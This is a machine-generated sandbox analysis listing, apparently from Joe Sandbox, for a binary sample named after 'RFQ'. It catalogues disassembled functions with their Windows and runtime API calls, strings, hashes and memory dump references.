                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                          Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                          • __lock.LIBCMT ref: 00417981
                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                          • __lock.LIBCMT ref: 004179A2
                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                          • String ID: KERNEL32.DLL$pI
                                                                          • API String ID: 637971194-197072765
                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                          Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_malloc
                                                                          • String ID:
                                                                          • API String ID: 1938898002-0
                                                                          • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                          • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                          Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                          • String ID:
                                                                          • API String ID: 2737351978-0
                                                                          • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                          • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                          Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                          • __getptd.LIBCMT ref: 00415253
                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                          • _free.LIBCMT ref: 0041529E
                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 3638380555-0
                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                          Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 3207048006-625585964
                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                          Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                          • String ID:
                                                                          • API String ID: 2945290962-0
                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                          Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                          • String ID:
                                                                          • API String ID: 1457242333-0
                                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                          Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                          Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 780548581-3081909835
                                                                          • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                          • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                          Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                          • String ID:
                                                                          • API String ID: 4082120231-0
                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                          Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2027346449-0
                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                          Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetMenu.USER32 ref: 0047A703
                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
